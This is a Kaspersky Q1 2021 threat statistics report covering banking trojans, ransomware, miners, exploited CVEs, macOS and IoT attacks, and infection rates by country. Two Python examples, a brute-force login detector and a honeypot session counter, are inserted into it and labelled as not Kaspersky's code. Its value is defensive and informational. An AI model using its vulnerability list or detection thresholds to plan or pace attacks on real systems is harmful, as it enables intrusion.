
_These statistics are based on detection verdicts of Kaspersky products received from users who consented to provide statistical data._
## Quarterly figures
According to Kaspersky Security Network, in Q1 2021:
* Kaspersky solutions blocked 2,023,556,082 attacks launched from online resources across the globe.
* 613,968,631 unique URLs were recognized as malicious by Web Anti-Virus components.
* Attempts to run malware designed to steal money via online access to bank accounts were stopped on the computers of 118,099 users.
* Ransomware attacks were defeated on the computers of 91,841 unique users.
* Our File Anti-Virus detected 77,415,192 unique malicious and potentially unwanted objects.
## Financial threats
### Financial threat statistics
At the end of last year, the number of users attacked by malware designed to steal money from bank accounts gradually decreased, a trend that continued in Q1 2021. This quarter, in total, Kaspersky solutions blocked this type of malware on the computers of 118,099 unique users.
_Number of unique users attacked by financial malware, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24110545/01-en-malware-report-q1-2021-pc.png>))_
**Attack geography**
_To evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, for each country we calculated the share of users of Kaspersky products who faced this threat during the reporting period as a percentage of all users of our products in that country._
_Geography of financial malware attacks, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24110629/02-en-malware-report-q1-2021-pc.png>))_
**Top 10 countries by share of attacked users**
|   | Country* | %** |
|---|---|---|
| 1 | Turkmenistan | 6.3 |
| 2 | Tajikistan | 5.3 |
| 3 | Afghanistan | 4.8 |
| 4 | Uzbekistan | 4.6 |
| 5 | Paraguay | 3.2 |
| 6 | Yemen | 2.1 |
| 7 | Costa Rica | 2.0 |
| 8 | Sudan | 2.0 |
| 9 | Syria | 1.5 |
| 10 | Venezuela | 1.4 |

_* Excluded are countries with relatively few Kaspersky product users (under 10,000)._
_** Unique users whose computers were targeted by financial malware as a percentage of all unique users of Kaspersky products in the country._
As before, the most widespread family of bankers in Q1 was ZeuS/Zbot (30.8%). Second place was taken by the CliptoShuffler family (15.9%), and third by Trickster (7.5%). All in all, more than half of all attacked users encountered these families. The notorious banking Trojan Emotet (7.4%) was deprived of its infrastructure this quarter as a result of a [joint operation](<https://www.europol.europa.eu/newsroom/news/world's-most-dangerous-malware-emotet-disrupted-through-global-action>) by Europol, the FBI and other law enforcement agencies, and its share predictably collapsed.
**Top 10 banking malware families**
|   | Name | Verdicts | %* |
|---|---|---|---|
| 1 | Zbot | Trojan.Win32.Zbot | 30.8 |
| 2 | CliptoShuffler | Trojan-Banker.Win32.CliptoShuffler | 15.9 |
| 3 | Trickster | Trojan.Win32.Trickster | 7.5 |
| 4 | Emotet | Backdoor.Win32.Emotet | 7.4 |
| 5 | RTM | Trojan-Banker.Win32.RTM | 6.6 |
| 6 | Nimnul | Virus.Win32.Nimnul | 5.1 |
| 7 | Nymaim | Trojan.Win32.Nymaim | 4.7 |
| 8 | SpyEye | Trojan-Spy.Win32.SpyEye | 3.8 |
| 9 | Danabot | Trojan-Banker.Win32.Danabot | 2.9 |
| 10 | Neurevt | Trojan.Win32.Neurevt | 2.2 |

_* Unique users who encountered this malware family as a percentage of all users attacked by financial malware._
## Ransomware programs
### Quarterly trends and highlights
**New additions to the ransomware arsenal**
Last year, the SunCrypt and RagnarLocker ransomware groups adopted new scare tactics. If the victim organization is slow to pay up, even though its files are encrypted and some of its confidential data has been stolen, the attackers additionally threaten to carry out a DDoS attack. In Q1 2021, these two groups were joined by a third, Avaddon. Besides publishing stolen data, the ransomware operators said on their website that the victim would be subjected to a DDoS attack until it reached out to them.
REvil (aka Sodinokibi) is another group looking to increase its extortion leverage. In addition to DDoS attacks, it has [added](<https://twitter.com/3xp0rtblog/status/1368149692383719426>) spam and calls to clients and partners of the victim company to its toolbox.
**Attacks on vulnerable Exchange servers**
[Serious vulnerabilities were recently discovered](<https://securelist.com/zero-day-vulnerabilities-in-microsoft-exchange-server/101096/>) in the Microsoft Exchange mail server, allowing [remote code execution](<https://encyclopedia.kaspersky.com/glossary/remote-code-execution-rce/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>). Ransomware distributors wasted no time in exploiting these vulnerabilities; to date, this infection vector has been seen in use by the Black Kingdom and DearCry families.
**Publication of keys**
The developers of the Fonix (aka XINOF) ransomware ceased distributing their Trojan and posted the master key online for decrypting affected files. We took this key and created a [decryptor](<https://www.kaspersky.com/blog/fonix-decryptor/38646/>) that anyone can use. The developers of another strain of ransomware, Ziggy, not only [published](<https://www.bleepingcomputer.com/news/security/ziggy-ransomware-shuts-down-and-releases-victims-decryption-keys/>) the keys for all victims, but also announced their [intention](<https://www.bleepingcomputer.com/news/security/ransomware-admin-is-refunding-victims-their-ransom-payments/>) to return the money to everyone who paid up.
**Law enforcement successes**
Law enforcement agencies under the US Department of Justice [seized](<https://www.justice.gov/opa/pr/department-justice-launches-global-action-against-netwalker-ransomware>) dark web resources used by NetWalker (aka Mailto) ransomware affiliates, and also brought charges against one of the alleged actors.
French and Ukrainian law enforcers worked together to trace payments made through the Bitcoin ecosystem to Egregor ransomware distributors. The joint investigation resulted in the [arrest](<https://www.bleepingcomputer.com/news/security/egregor-ransomware-affiliates-arrested-by-ukrainian-french-police/>) of several alleged members of the Egregor gang.
In South Korea, a suspect in the GandCrab ransomware operation was [arrested](<https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-affiliate-arrested-for-phishing-attacks/>) (this family ceased active distribution back in 2019).
### Number of new modifications
In Q1 2021, we detected seven new ransomware families and 4,354 new modifications of this malware type.
_Number of new ransomware modifications, Q1 2020 – Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24110702/03-en-ru-es-malware-report-q1-2021-pc.png>))_
### Number of users attacked by ransomware Trojans
In Q1 2021, Kaspersky products and technologies protected 91,841 users from ransomware attacks.
_Number of unique users attacked by ransomware Trojans, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24110733/04-en-malware-report-q1-2021-pc.png>))_
### Attack geography
_Geography of attacks by ransomware Trojans, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24110802/05-en-malware-report-q1-2021-pc.png>))_
**Top 10 countries attacked by ransomware Trojans**
|   | Country* | %** |
|---|---|---|
| 1 | Bangladesh | 2.31% |
| 2 | Ethiopia | 0.62% |
| 3 | Greece | 0.49% |
| 4 | Pakistan | 0.49% |
| 5 | China | 0.48% |
| 6 | Tunisia | 0.44% |
| 7 | Afghanistan | 0.42% |
| 8 | Indonesia | 0.38% |
| 9 | Taiwan, Province of China | 0.37% |
| 10 | Egypt | 0.28% |

_* Excluded are countries with relatively few Kaspersky users (under 50,000)._
_** Unique users attacked by ransomware Trojans as a percentage of all unique users of Kaspersky products in the country._
### Top 10 most common families of ransomware Trojans
|   | Name | Verdicts | %* |
|---|---|---|---|
| 1 | WannaCry | Trojan-Ransom.Win32.Wanna | 19.37% |
| 2 | (generic verdict) | Trojan-Ransom.Win32.Gen | 12.01% |
| 3 | (generic verdict) | Trojan-Ransom.Win32.Phny | 9.31% |
| 4 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 8.45% |
| 5 | (generic verdict) | Trojan-Ransom.Win32.Agent | 7.36% |
| 6 | PolyRansom/VirLock | Trojan-Ransom.Win32.PolyRansom, Virus.Win32.PolyRansom | 3.78% |
| 7 | (generic verdict) | Trojan-Ransom.Win32.Crypren | 2.93% |
| 8 | Stop | Trojan-Ransom.Win32.Stop | 2.79% |
| 9 | (generic verdict) | Trojan-Ransom.Win32.Cryptor | 2.17% |
| 10 | REvil/Sodinokibi | Trojan-Ransom.Win32.Sodin | 1.85% |

_* Unique Kaspersky users attacked by this family of ransomware Trojans as a percentage of all users attacked by such malware._
## Miners
### Number of new modifications
In Q1 2021, Kaspersky solutions detected 23,894 new modifications of miners. Although January and February were relatively calm, March saw a sharp rise in the number of new modifications — more than fourfold compared to February.
_Number of new miner modifications, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24110831/06-en-malware-report-q1-2021-pc.png>))_
### Number of users attacked by miners
In Q1, we detected attacks using miners on the computers of 432,171 unique users of Kaspersky products worldwide. Although this figure has been rising for three months, it is premature to talk about a reversal of last year's trend, whereby the number of users attacked by miners actually fell. For now, we can tentatively assume that the growth in cryptocurrency prices, in particular bitcoin, has attracted the attention of cybercriminals and returned miners to their toolkit.
_Number of unique users attacked by miners, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24111053/07-en-malware-report-q1-2021-pc.png>))_
### Attack geography
_Geography of miner attacks, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24111128/08-en-malware-report-q1-2021-pc.png>))_
**Top 10 countries attacked by miners**
|   | Country* | %** |
|---|---|---|
| 1 | Afghanistan | 4.65 |
| 2 | Ethiopia | 3.00 |
| 3 | Rwanda | 2.37 |
| 4 | Uzbekistan | 2.23 |
| 5 | Kazakhstan | 1.81 |
| 6 | Sri Lanka | 1.78 |
| 7 | Ukraine | 1.59 |
| 8 | Vietnam | 1.48 |
| 9 | Mozambique | 1.46 |
| 10 | Tanzania | 1.45 |

_* Excluded are countries with relatively few users of Kaspersky products (under 50,000)._
_** Unique users attacked by miners as a percentage of all unique users of Kaspersky products in the country._
## Vulnerable applications used by cybercriminals during cyber attacks
In Q1 2021, we noted a drop in the share of exploits for vulnerabilities in the Microsoft Office suite, but they still lead the pack with 59%. The most common vulnerability in the suite remains [CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>), a stack buffer overflow that occurs when processing objects in the Equation Editor component. Exploits for [CVE-2015-2523](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2523>) — use-after-free vulnerabilities in Microsoft Excel — and [CVE-2018-0802](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0802>), which we've often written about, were also in demand. Note the age of these vulnerabilities — even the latest of them was discovered almost three years ago. So, once again, we remind you of the importance of regular updates.
The first quarter was rich not only in known exploits, but also new zero-day vulnerabilities. In particular, the interest of both [infosec experts](<https://securelist.com/zero-day-vulnerabilities-in-microsoft-exchange-server/101096/>) and cybercriminals was piqued by vulnerabilities in the popular Microsoft Exchange Server:
* [CVE-2021-26855](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-26855>) — a server-side request forgery (SSRF) vulnerability that allows remote code execution (RCE)
* [CVE-2021-26857](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-26857>) — an insecure deserialization vulnerability in the Unified Messaging service that can lead to code execution on the server
* [CVE-2021-26858](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-26858>) — a post-authentication arbitrary file write vulnerability in Microsoft Exchange, which could also lead to remote code execution
* [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-27065>) — as with [CVE-2021-26858](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-26858>), allows an authenticated Microsoft Exchange user to write data to an arbitrary file on the system
Found [in the wild](<https://encyclopedia.kaspersky.com/glossary/exploitation-in-the-wild-itw/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>), these vulnerabilities were used by APT groups, including as a springboard for ransomware distribution.
During the quarter, vulnerabilities were also identified in Windows itself. In particular, the [CVE-2021-1732](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-1732>) vulnerability allowing privilege escalation was discovered in the Win32k subsystem. Two other vulnerabilities, [CVE-2021-1647](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-1647>) and [CVE-2021-24092](<https://nvd.nist.gov/vuln/detail/CVE-2021-24092>), were found in the Microsoft Defender antivirus engine, allowing elevation of user privileges in the system and execution of potentially dangerous code.
_Distribution of exploits used by cybercriminals, by type of attacked application, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24111159/09-en-malware-report-q1-2021-pc.png>))_
The second most popular were exploits for browser vulnerabilities (26.12%); their share in Q1 grew by more than 12 p.p. Here, too, there were newcomers: for example, the Internet Explorer script engine was found to contain the [CVE-2021-26411](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-26411>) vulnerability, which can lead to remote code execution on behalf of the current user through manipulations that corrupt heap memory. This vulnerability was exploited by the [Lazarus](<https://securelist.ru/tag/lazarus/>) group to download malicious code and infect the system. Several vulnerabilities were discovered in Google Chrome:
* [CVE-2021-21148](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21148>) — heap buffer overflow in the V8 script engine, leading to remote code execution
* [CVE-2021-21166](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21166>) — overflow and unsafe reuse of an object in memory when processing audio data, also enabling remote code execution
* [CVE-2021-21139](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21139>) — bypassing security restrictions when using an iframe
Other interesting findings include a critical vulnerability in VMware vCenter Server, [CVE-2021-21972](<https://nvd.nist.gov/vuln/detail/CVE-2021-21972>), which allows remote code execution without any rights. Critical vulnerabilities in the popular SolarWinds Orion Platform — [CVE-2021-25274](<https://nvd.nist.gov/vuln/detail/CVE-2021-25274>), [CVE-2021-25275](<https://nvd.nist.gov/vuln/detail/CVE-2021-25275>) and [CVE-2021-25276](<https://nvd.nist.gov/vuln/detail/CVE-2021-25276>) — caused a major splash in the infosec environment. They gave attackers the ability to infect computers running this software, usually machines inside corporate networks and government institutions. Lastly, the [CVE-2021-21017](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21017>) vulnerability, discovered in Adobe Reader, caused a heap buffer overflow by means of a specially crafted document, giving an attacker the ability to execute code.
Analysis of network threats in Q1 2021 continued to show ongoing attempts to attack servers with a view to brute-force passwords for network services such as Microsoft SQL Server, RDP and SMB. Attacks using the popular EternalBlue, EternalRomance and other similar exploits were widespread. Among the most notable new vulnerabilities in this period were bugs in the Windows networking stack code related to handling the IPv4/IPv6 protocols: [CVE-2021-24074](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-24074>), [CVE-2021-24086](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-24086>) and [CVE-2021-24094](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-24094>).
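The password brute-forcing against Microsoft SQL Server, RDP and SMB mentioned above is the kind of activity a defender can catch with a simple sliding-window rule over authentication events. The following is an added example, not Kaspersky's detection logic; the event format ("timestamp service source_ip FAIL|SUCCESS user"), the sample events and the threshold values are all constructed for this illustration.

```python
"""Sliding-window detector for password brute-forcing against network
services (MSSQL, RDP, SMB). Added example, not Kaspersky's code. The event
format is invented for this example:
"<ISO timestamp> <service> <source_ip> <FAIL|SUCCESS> <user>"."""
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample events: a rapid burst of failures against MSSQL from one
# source that ends in a successful logon, two slow RDP failures from a user
# who then logs in normally, and two SMB failures a minute apart.
SAMPLE_EVENTS = """\
2021-03-02T10:00:01 mssql 203.0.113.7 FAIL sa
2021-03-02T10:00:02 mssql 203.0.113.7 FAIL sa
2021-03-02T10:00:02 mssql 203.0.113.7 FAIL admin
2021-03-02T10:00:03 mssql 203.0.113.7 FAIL sa
2021-03-02T10:00:04 mssql 203.0.113.7 FAIL sa
2021-03-02T10:00:05 mssql 203.0.113.7 FAIL sa
2021-03-02T10:00:06 mssql 203.0.113.7 SUCCESS sa
2021-03-02T10:00:10 rdp 198.51.100.4 FAIL jdoe
2021-03-02T10:05:10 rdp 198.51.100.4 FAIL jdoe
2021-03-02T10:05:12 rdp 198.51.100.4 SUCCESS jdoe
2021-03-02T10:30:00 smb 192.0.2.9 FAIL backup
2021-03-02T10:31:00 smb 192.0.2.9 FAIL backup
"""


def parse_events(text):
    """Parse the constructed format into time-sorted
    (timestamp, service, source_ip, result, user) tuples."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, service, src, result, user = line.split()
        events.append((datetime.fromisoformat(ts), service, src, result, user))
    events.sort(key=lambda e: e[0])
    return events


def detect_bruteforce(events, threshold=5, window_seconds=60):
    """Raise one alert per (service, source) once `threshold` failures fall
    inside a sliding window of `window_seconds`. A later SUCCESS from the
    same source upgrades the alert: the guessing may have worked."""
    window = timedelta(seconds=window_seconds)
    failures = defaultdict(deque)   # (service, src) -> recent failure timestamps
    alerts = {}                      # (service, src) -> alert, in trigger order
    for ts, service, src, result, user in events:
        key = (service, src)
        if result == "FAIL":
            q = failures[key]
            q.append(ts)
            while q and ts - q[0] > window:   # evict failures outside the window
                q.popleft()
            if len(q) >= threshold and key not in alerts:
                alerts[key] = {
                    "service": service,
                    "source": src,
                    "first_failure": q[0].isoformat(),
                    "failures": len(q),
                    "success_after": False,
                }
        elif result == "SUCCESS" and key in alerts:
            alerts[key]["success_after"] = True
            alerts[key]["account"] = user
    return list(alerts.values())


if __name__ == "__main__":
    for alert in detect_bruteforce(parse_events(SAMPLE_EVENTS)):
        print(alert)
```

With the default settings only the MSSQL burst fires (five failures within one minute, followed by a successful logon as `sa`); the two slow RDP failures and the two SMB failures stay below the threshold. Loosening the rule to two failures in ten minutes flags all three sources, which shows why the window and threshold must be tuned against the service's normal failure rate.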
## Attacks on macOS
Q1 2021 was also rich in macOS-related news. Center stage was taken by cybercriminals who adapted their [malware for the newly released MacBooks with M1 processors](<https://securelist.com/malware-for-the-new-apple-silicon-platform/101137/>). Updated adware for the new Macs also appeared immediately, in particular the [Pirrit family](<https://objective-see.com/blog/blog_0x62.html>) (whose members placed high in our Top 20 threats for macOS). In addition, we detected an interesting adware program written in the Rust language, and assigned it the verdict [AdWare.OSX.Convuster.a](<https://securelist.ru/convuster-macos-adware-in-rust/100859/>).
**Top 20 threats for macOS**
|   | Verdict | %* |
|---|---|---|
| 1 | AdWare.OSX.Pirrit.ac | 18.01 |
| 2 | AdWare.OSX.Pirrit.j | 12.69 |
| 3 | AdWare.OSX.Pirrit.o | 8.42 |
| 4 | AdWare.OSX.Bnodlero.at | 8.36 |
| 5 | Monitor.OSX.HistGrabber.b | 8.06 |
| 6 | AdWare.OSX.Pirrit.gen | 7.95 |
| 7 | Trojan-Downloader.OSX.Shlayer.a | 7.90 |
| 8 | AdWare.OSX.Cimpli.m | 6.17 |
| 9 | AdWare.OSX.Pirrit.aa | 6.05 |
| 10 | Backdoor.OSX.Agent.z | 5.27 |
| 11 | Trojan-Downloader.OSX.Agent.h | 5.09 |
| 12 | AdWare.OSX.Bnodlero.bg | 4.60 |
| 13 | AdWare.OSX.Ketin.h | 4.02 |
| 14 | AdWare.OSX.Bnodlero.bc | 3.87 |
| 15 | AdWare.OSX.Bnodlero.t | 3.84 |
| 16 | AdWare.OSX.Cimpli.l | 3.75 |
| 17 | Trojan-Downloader.OSX.Lador.a | 3.61 |
| 18 | AdWare.OSX.Cimpli.k | 3.48 |
| 19 | AdWare.OSX.Ketin.m | 2.98 |
| 20 | AdWare.OSX.Bnodlero.ay | 2.94 |

_* Unique users who encountered this malware as a percentage of all users of Kaspersky security solutions for macOS who were attacked._
Traditionally, most of the Top 20 threats for macOS are adware programs: 15 in Q1. In the list of malicious programs, Trojan-Downloader.OSX.Shlayer.a (7.90%) maintained its popularity. Incidentally, this Trojan's task is to download adware from the Pirrit and Bnodlero families. But we also saw the reverse, when a member of the AdWare.OSX.Pirrit family dropped Backdoor.OSX.Agent.z into the system.
### Threat geography
_Geography of threats for macOS, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24111228/10-en-malware-report-q1-2021-pc.png>))_
**Top 10 countries by share of attacked users**
|   | Country* | %** |
|---|---|---|
| 1 | France | 4.62 |
| 2 | Spain | 4.43 |
| 3 | Italy | 4.36 |
| 4 | India | 4.11 |
| 5 | Canada | 3.59 |
| 6 | Mexico | 3.55 |
| 7 | Russia | 3.21 |
| 8 | Brazil | 3.18 |
| 9 | Great Britain | 2.96 |
| 10 | USA | 2.94 |

_* Excluded from the rating are countries with relatively few users of Kaspersky security solutions for macOS (under 10,000)._
_** Unique users attacked as a percentage of all users of Kaspersky security solutions for macOS in the country._
In Q1 2021, Europe accounted for the Top 3 countries by share of attacked macOS users: France (4.62%), Spain (4.43%) and Italy (4.36%). The most common threats in all three were adware apps from the Pirrit family.
## IoT attacks
### IoT threat statistics
In Q1 2021, most of the devices that attacked Kaspersky traps did so using the Telnet protocol. A third of the attacking devices attempted to [brute-force](<https://encyclopedia.kaspersky.com/glossary/brute-force/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) our SSH traps.
| Service | % |
|---|---|
| Telnet | 69.48% |
| SSH | 30.52% |

_Distribution of attacked services by number of unique IP addresses of devices that carried out attacks, Q1 2021_
The statistics for cybercriminal working sessions with Kaspersky honeypots show similar Telnet dominance.
| Service | % |
|---|---|
| Telnet | 77.81% |
| SSH | 22.19% |

_Distribution of cybercriminal working sessions with Kaspersky traps, Q1 2021_
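The two tables above count the same honeypot activity in two ways: by unique attacking IP address and by working session, and the Telnet share differs between them because a single device can open many sessions. The following added example (not Kaspersky's honeypot code) makes that difference concrete; the log format ("timestamp service source_ip session_id") and the sample lines are constructed for the illustration.

```python
"""Honeypot session accounting: the Telnet/SSH split by unique attacking IP
versus by working session. Added example, not Kaspersky's code. Log format
invented for this example: "<ISO timestamp> <service> <source_ip> <session_id>"."""
from collections import Counter

# Constructed sample: three Telnet sources (two of them open several
# sessions) and two SSH sources (one opens three sessions).
SAMPLE_LOG = """\
2021-01-05T02:11:09 telnet 203.0.113.10 s1
2021-01-05T02:11:40 telnet 203.0.113.10 s2
2021-01-05T02:12:00 telnet 203.0.113.11 s3
2021-01-05T02:13:00 telnet 203.0.113.12 s4
2021-01-05T02:13:30 telnet 203.0.113.12 s5
2021-01-05T02:14:00 ssh 198.51.100.20 s6
2021-01-05T02:14:30 ssh 198.51.100.20 s7
2021-01-05T02:14:50 ssh 198.51.100.20 s8
2021-01-05T02:15:00 ssh 198.51.100.21 s9
"""


def parse_sessions(text):
    """Parse the constructed log into a list of record dicts."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, service, src, session = line.split()
        records.append({"ts": ts, "service": service, "src": src, "session": session})
    return records


def _percentages(counter):
    """Turn per-service counts into percentages rounded to two decimals."""
    total = sum(counter.values())
    return {service: round(100 * n / total, 2) for service, n in counter.items()}


def share_by_unique_ip(records):
    """'Unique IP' view: each (service, source IP) pair is counted once."""
    pairs = {(r["service"], r["src"]) for r in records}
    return _percentages(Counter(service for service, _ in pairs))


def share_by_session(records):
    """'Working sessions' view: each distinct session is counted."""
    pairs = {(r["service"], r["session"]) for r in records}
    return _percentages(Counter(service for service, _ in pairs))


def sessions_per_ip(records):
    """How many sessions each source opened: the reason the two views differ."""
    return Counter(r["src"] for r in records)


if __name__ == "__main__":
    recs = parse_sessions(SAMPLE_LOG)
    print("by unique IP:", share_by_unique_ip(recs))
    print("by session:  ", share_by_session(recs))
    print("sessions/IP: ", dict(sessions_per_ip(recs)))
```

On the constructed data the unique-IP view gives Telnet 60% / SSH 40%, while the session view gives Telnet 55.56% / SSH 44.44%, because the single SSH source 198.51.100.20 accounts for three of the four SSH sessions. Which view to report depends on the question: unique IPs approximate the size of the attacking device population, sessions approximate attacker effort.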
_Geography of IP addresses of devices from which attempts were made to attack Kaspersky Telnet traps, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24111259/11-en-malware-report-q1-2021-pc.png>))_
**Top 10 countries by location of devices from which attacks were carried out on Kaspersky Telnet traps**
|   | Country | %* |
|---|---|---|
| 1 | China | 33.40 |
| 2 | India | 13.65 |
| 3 | USA | 11.56 |
| 4 | Russia | 4.96 |
| 5 | Montenegro | 4.20 |
| 6 | Brazil | 4.19 |
| 7 | Taiwan, Province of China | 2.32 |
| 8 | Iran | 1.85 |
| 9 | Egypt | 1.84 |
| 10 | Vietnam | 1.73 |

_* Devices from which attacks were carried out in the given country as a percentage of the total number of devices in that country._
### SSH-based attacks
_Geography of IP addresses of devices from which attempts were made to attack Kaspersky SSH traps, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24111335/12-en-malware-report-q1-2021-pc.png>))_
**Top 10 countries by location of devices from which attacks were made on Kaspersky SSH traps**
|   | Country | %* |
|---|---|---|
| 1 | USA | 24.09 |
| 2 | China | 19.89 |
| 3 | Hong Kong | 6.38 |
| 4 | South Korea | 4.37 |
| 5 | Germany | 4.06 |
| 6 | Brazil | 3.74 |
| 7 | Russia | 3.05 |
| 8 | Taiwan, Province of China | 2.80 |
| 9 | France | 2.59 |
| 10 | India | 2.36 |

_* Devices from which attacks were carried out in the given country as a percentage of the total number of devices in that country._
### Threats loaded into traps
|   | Verdict | %* |
|---|---|---|
| 1 | Backdoor.Linux.Mirai.b | 50.50% |
| 2 | Trojan-Downloader.Linux.NyaDrop.b | 9.26% |
| 3 | Backdoor.Linux.Gafgyt.a | 3.01% |
| 4 | HEUR:Trojan-Downloader.Shell.Agent.bc | 2.72% |
| 5 | Backdoor.Linux.Mirai.a | 2.72% |
| 6 | Backdoor.Linux.Mirai.ba | 2.67% |
| 7 | Backdoor.Linux.Agent.bc | 2.37% |
| 8 | Trojan-Downloader.Shell.Agent.p | 1.37% |
| 9 | Backdoor.Linux.Gafgyt.bj | 0.78% |
| 10 | Trojan-Downloader.Linux.Mirai.d | 0.66% |

_* Share of malware type in the total number of malicious programs downloaded to IoT devices following a successful attack._
## Attacks via web resources
_The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Cybercriminals create such sites on purpose; web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected._
### Countries that are sources of web-based attacks: Top 10
_The following statistics show the distribution by country of the sources of Internet attacks blocked by Kaspersky products on user computers (web pages with redirects to exploits, sites containing exploits and other malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks._
_To determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established._
In Q1 2021, Kaspersky solutions blocked 2,023,556,082 attacks launched from online resources located across the globe. 613,968,631 unique URLs were recognized as malicious by Web Anti-Virus.
_Distribution of web attack sources by country, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24111405/13-en-malware-report-q1-2021-pc.png>))_
### Countries where users faced the greatest risk of online infection
To assess the risk of online infection faced by users in different countries, for each country we calculated the percentage of Kaspersky users on whose computers Web Anti-Virus was triggered during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.
This rating only includes attacks by malicious objects that fall under the **Malware class**; it does not include Web Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.
|   | Country* | % of attacked users** |
|---|---|---|
| 1 | Belarus | 15.81 |
| 2 | Ukraine | 13.60 |
| 3 | Moldova | 13.16 |
| 4 | Kyrgyzstan | 11.78 |
| 5 | Latvia | 11.38 |
| 6 | Algeria | 11.16 |
| 7 | Russia | 11.11 |
| 8 | Mauritania | 11.08 |
| 9 | Kazakhstan | 10.62 |
| 10 | Tajikistan | 10.60 |
| 11 | Uzbekistan | 10.39 |
| 12 | Estonia | 10.20 |
| 13 | Armenia | 9.44 |
| 14 | Mongolia | 9.36 |
| 15 | France | 9.35 |
| 16 | Greece | 9.04 |
| 17 | Azerbaijan | 8.57 |
| 18 | Madagascar | 8.56 |
| 19 | Morocco | 8.55 |
| 20 | Lithuania | 8.53 |

_* Excluded are countries with relatively few Kaspersky users (under 10,000)._
_** Unique users targeted by **Malware-class** attacks as a percentage of all unique users of Kaspersky products in the country._
_These statistics are based on detection verdicts by the Web Anti-Virus module that were received from users of Kaspersky products who consented to provide statistical data._
On average, 7.67% of Internet user computers worldwide experienced at least one **Malware-class** attack.
_Geography of web-based malware attacks, Q1 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/24111435/14-en-malware-report-q1-2021-pc.png>))_
## Local threats
_In this section, we analyze statistical data obtained from the OAS and ODS modules in Kaspersky products. It takes into account malicious programs that were found directly on users' computers or removable media connected to them (flash drives, camera memory cards, phones, external hard drives), or which initially made their way onto the computer in non-open form (for example, programs in complex installers, encrypted files, etc.)._
In Q1 2021, our File Anti-Virus detected **77,415,192** malicious and potentially unwanted objects.
### Countries where users faced the highest risk of local infection
For each country, we calculated the percentage of Kaspersky product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.
Note that this rating only includes attacks by malicious programs that fall under the **Malware class**; it does not include File Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.
|   | Country* | % of attacked users** |
|---|---|---|
| 1 | Afghanistan | 47.71 |
| 2 | Turkmenistan | 43.39 |
| 3 | Ethiopia | 41.03 |
| 4 | Tajikistan | 38.96 |
| 5 | Bangladesh | 36.21 |
| 6 | Algeria | 35.49 |
| 7 | Myanmar | 35.16 |
| 8 | Uzbekistan | 34.95 |
| 9 | South Sudan | 34.17 |
| 10 | Benin | 34.08 |
| 11 | China | 33.34 |
| 12 | Iraq | 33.14 |
| 13 | Laos | 32.84 |
| 14 | Burkina Faso | 32.61 |
| 15 | Mali | 32.42 |
| 16 | Guinea | 32.40 |
| 17 | Yemen | 32.32 |
| 18 | Mauritania | 32.22 |
| 19 | Burundi | 31.68 |
| 20 | Sudan | 31.61 |

_* Excluded are countries with relatively few Kaspersky users (under 10,000)._
_** Unique users on whose computers **Malware-class** local threats were blocked, as a percentage of all unique users of Kaspersky products in the country._
